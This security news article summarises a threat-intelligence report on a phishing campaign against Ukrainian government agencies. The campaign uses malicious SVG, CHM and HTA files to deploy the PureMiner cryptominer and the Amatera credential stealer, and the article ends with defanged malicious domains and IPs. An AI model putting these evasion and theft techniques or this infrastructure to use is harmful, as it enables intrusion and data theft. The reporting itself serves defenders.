Cybercriminals are exploiting SVG files as an initial attack vector in a multi-stage campaign designed to impersonate Ukrainian government communications.
FortiGuard Labs has uncovered a sophisticated phishing campaign targeting Ukrainian government agencies through malicious Scalable Vector Graphics (SVG) files, ultimately deploying both cryptocurrency mining malware and information stealers to compromise victim systems.
The attack begins with phishing emails containing malicious SVG attachments that masquerade as official notices from the National Police of Ukraine, pressuring recipients with legal-sounding language about pending appeals and potential consequences for non-compliance.
The SVG file, named “elektronni_zapit_NPU.svg,” contains an embedded HTML iframe element that references an external SVG resource.
When opened, it displays a spoofed Adobe Reader interface showing “Please wait, your document is loading…” in Ukrainian, automatically redirecting victims to download a password-protected archive while conveniently displaying the extraction password.
The downloaded archive contains a Compiled HTML Help (CHM) file that initiates a complex infection sequence.
Within the CHM file, investigators discovered a malicious HTML file containing a shortcut object whose Click method executes a remote HTML Application (HTA) resource in hidden mode.
The HTA file functions as a CountLoader, deliberately obfuscated using string encoding and array shuffling techniques.
This loader establishes connections with remote servers, collects victim system information, and sends it via HTTP POST requests using XorBase64 encoding.
The loader supports six distinct commands enabling file downloads, archive extractions, DLL executions, domain reconnaissance, and activity cleanup.
Dual Payload Deployment
PureMiner Cryptominer
The campaign deploys PureMiner, a stealthy .NET cryptominer delivered through the ergosystem.zip archive.
This malware utilizes DLL sideloading techniques and .NET Ahead-of-Time (AOT) compilation, storing its payload in encrypted form within the .rdata section before decrypting and injecting it into legitimate .NET Framework processes using process hollowing.
PureMiner conducts extensive hardware reconnaissance, utilizing APIs from AMD Display Library and NVIDIA libraries to collect video adapter specifications, memory details, and usage statistics.
The malware verifies systems have at least 4GB of memory before deployment and can deploy either CPU-based or GPU-based mining modules depending on configuration requirements.
The malware maintains persistent communication with command-and-control servers using 3DES encryption, capable of executing downloaded payloads, removing persistence mechanisms, monitoring analysis tools, checking active windows, and detecting system idle states.
Amatera Stealer Information Harvester
Simultaneously, the smtpB.zip archive delivers Amatera Stealer through a Python-based loader utilizing the PythonMemoryModule project for fileless execution.
This stealer creates hardcoded mutex values and connects to remote servers to obtain Base64-encoded, RC4-encrypted configuration files that control data harvesting operations.
Amatera Stealer systematically targets multiple data categories including system information (computer names, usernames, operating systems, hardware specifications), browser data from both Gecko-based and Chromium-based applications, cryptocurrency wallet extensions, desktop applications like Steam and Telegram, and cryptocurrency desktop wallets.
The malware employs sophisticated techniques for bypassing modern browser security, including legacy cookie decryption and App-Bound Encrypted (ABE) data decryption through COM API exploitation and browser process injection.
Impact and Implications
This campaign demonstrates the evolution of phishing tactics, showcasing how SVG files can serve as HTML substitutes to initiate infection chains while evading traditional security measures.
The combination of resource hijacking through cryptocurrency mining and comprehensive data theft creates dual revenue streams for attackers.
The targeting of Ukrainian government entities during ongoing geopolitical tensions highlights the campaign’s potential state-sponsored or politically motivated nature.
Organizations should implement comprehensive security awareness training, update email filtering systems to scrutinize SVG attachments, and deploy endpoint detection solutions capable of identifying fileless malware execution techniques.
The sophisticated use of legitimate Windows features like CHM files and HTA applications, combined with advanced evasion techniques, underscores the need for multi-layered security approaches that can detect and prevent such complex attack chains before critical data and resources are compromised.
IOCs
Domains / IPs:
npulvivgov[.]cfd
ms-team-ping{1 to 10}[.]com
azure-expresscontainer{1 to 10}[.]com
acqua-tecnica[.]it
phuyufact[.]com
109[.]176[.]207[.]110
amaprox[.]click
ama0899[.]shop
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
